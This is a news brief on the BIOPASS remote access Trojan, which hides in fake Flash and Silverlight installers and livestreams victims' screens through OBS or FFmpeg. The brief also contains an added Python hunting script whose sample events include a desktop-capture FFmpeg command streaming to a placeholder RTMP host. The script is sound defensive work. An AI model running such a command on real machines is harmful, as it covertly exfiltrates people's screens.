Date: 2021-07-15

Any infected computer’s screen is livestreamed by this malware. Don’t Let Yourself Become a Victim!

Researchers are discussing a new malware that abuses a popular live-streaming software to record and broadcast the screens of unwary victims.

Trend Micro researchers have found a new and unique remote access Trojan (RAT) called BIOPASS. The malware hides inside Microsoft Silverlight and Adobe Flash Player installers. According to the research, these malicious Silverlight and Flash installers load a sophisticated RAT that is implemented as Python scripts.

BIOPASS, according to Trend Micro's cybersecurity researchers, is not a standard RAT. It is particularly intriguing because it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).

This new malware has all of the characteristics of a remote access Trojan: it can perform file system analysis, remote desktop access, file extraction, screenshot capture, and shell command execution. It also downloads FFmpeg, a program that records, transcodes, and broadcasts video and audio, as well as Open Broadcaster Software, which is required for live streaming and video recording.

Malicious actors can watch the infected system’s desktop using either of the two frameworks. They can also upload the video to the cloud, allowing them to monitor the feed in real time through the BIOPASS management panel. Researchers observed that the script that retrieves BIOPASS, which is injected into the online help chat page of the target site, checks whether the visitor is already infected.
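The behaviour described above (Python scripts driving FFmpeg or OBS to stream a desktop over RTMP) suggests a simple hunting heuristic over process-creation logs. The sketch below is an added example, not Trend Micro's detection logic or anything taken from the malware; the event field names, paths, URL and scoring threshold are assumptions, and the sample events are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# Hosts, paths and URLs are invented for illustration; none come from the report.
EVENTS = [
    {"host": "ws-01", "image": r"C:\Program Files\obs-studio\bin\64bit\obs64.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "obs64.exe"},
    {"host": "ws-02", "image": r"C:\Users\Public\tools\ffmpeg.exe",
     "parent": r"C:\Users\Public\tools\python.exe",
     "cmd": "ffmpeg.exe -f gdigrab -i desktop -f flv rtmp://stream.example.invalid/live/key"},
    {"host": "ws-03", "image": r"C:\Users\alice\AppData\Local\Temp\obs\obs64.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "obs64.exe --startstreaming"},
    {"host": "ws-04", "image": r"C:\Program Files\ffmpeg\bin\ffmpeg.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "ffmpeg.exe -i in.mkv out.mp4"},
]

STREAM_TOOLS = {"ffmpeg.exe", "obs64.exe", "obs32.exe"}
SCRIPT_PARENTS = {"python.exe", "pythonw.exe"}
RTMP_URL = re.compile(r"\brtmps?://[^\s\"']+", re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")

def score_event(ev):
    """Return the list of reasons an event looks like scripted screen streaming."""
    image = PureWindowsPath(ev["image"])
    if image.name.lower() not in STREAM_TOOLS:
        return []
    reasons = []
    if RTMP_URL.search(ev["cmd"]):
        reasons.append("rtmp-destination")
    if PureWindowsPath(ev["parent"]).name.lower() in SCRIPT_PARENTS:
        reasons.append("python-parent")
    if any(part in ev["image"].lower() for part in USER_WRITABLE):
        reasons.append("user-writable-path")
    return reasons

def hunt(events, threshold=2):
    """Hosts where a streaming tool matches at least `threshold` heuristics."""
    hits = {}
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits[ev["host"]] = reasons
    return hits

if __name__ == "__main__":
    for host, reasons in hunt(EVENTS).items():
        print(host, ", ".join(reasons))
```

Requiring two independent signals keeps ordinary OBS and FFmpeg use out of the results; lowering the threshold to 1 widens the hunt at the cost of more noise.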

“If the script validates that the visitor has not yet been infected, it will then replace the original website content with the attackers’ own material,” according to Trend Micro. “The new page will display an error message along with an instruction to download either a Flash installer or a Silverlight installer, both of which are malicious loaders.”

Adobe stopped supporting Flash Player in 2020 and has been blocking Flash content since January 2021. Because of the severe security dangers, the company also advises users to delete the software from their devices. Microsoft followed suit, announcing that Silverlight support would be phased out in October of this year.

Trend Micro confirmed that the group behind the BIOPASS RAT has yet to be identified. Its cybersecurity researchers, however, identified many pieces of evidence linking the malware to alleged Chinese state-sponsored criminals.

Brief News from Washington Newsday.